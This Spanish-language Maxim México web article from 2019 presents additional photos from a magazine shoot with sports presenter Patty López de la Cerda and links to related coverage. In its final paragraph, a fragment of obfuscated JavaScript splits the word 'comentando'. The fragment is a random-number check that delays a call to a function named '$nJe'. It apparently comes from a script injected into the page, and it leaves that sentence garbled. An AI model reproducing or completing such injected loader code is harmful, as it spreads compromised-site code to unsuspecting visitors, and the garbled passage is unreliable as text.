Más fotos espectaculares de Patty López de la Cerda en Maxim

    Más fotos espectaculares de Patty López de la Cerda en Maxim

    Porque nunca es suficiente.

    Autor: Redacción Maxim 18 octubre, 2019



    Fotografía por Jorge Ramírez-Posada

     

     

    SESIÓN DE FOTOS DE PATTY LÓPEZ DE LA CERDA EN REVISTA MAXIM MÉXICO

     

    Este año hemos revivido nuestro romance platónico con Patty López de la Cerda, una de las conductoras de deportes con mayor popularidad en el país gracias a todas sus cualidades.

     

    Primero, les confesamos al mundo las poderosas razones por las que somos fans de su Instagram. Luego tuvimos una gran sesión de fotos para engalanar a la Revista Maxim México, cuyo adelanto puedes ver en este link.

     

    Por si esto fuera poco, la sometimos a nuestra clásica de sesión de Preguntas Incómodas, donde sacó chispas con sus confesiones y conocimientos deportivos, tan es así que hubo segunda parte.

     

    Luego nos contó Patty López de la Cerda cómo se ha labrado su carrera en el rudo mundo de la conducción deportiva, y también grabamos este video que está entre lo más sexy del año, el detrás de cámaras de su sesión de fotos en la Revista Maxim.

     

    La respuesta de todos ha sido tal que convencimos a los directivos de la revista para compartirles algunas imágenes más de esa gran sesión de fotos. No fue fácil, pero esperemos que les agraden  tanto como a nosotros nos encantó elegirlas.

     

    Sin más palabras, vayamos a las imágenes:

     

     

     

     

     

     

     

     

     

    Si quieres ver más contenido de Patty López de la Cerda en Maxim México, haz clic aquí.

     

     

    Si crees que no es suficiente y que deberíamos publicar más imágenes, expresa tu opinión comentandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en nuestras redes sociales. ¡Feliz año!

     

     

    Temas relacionados con esta nota: , ,

Porque nunca es suficiente.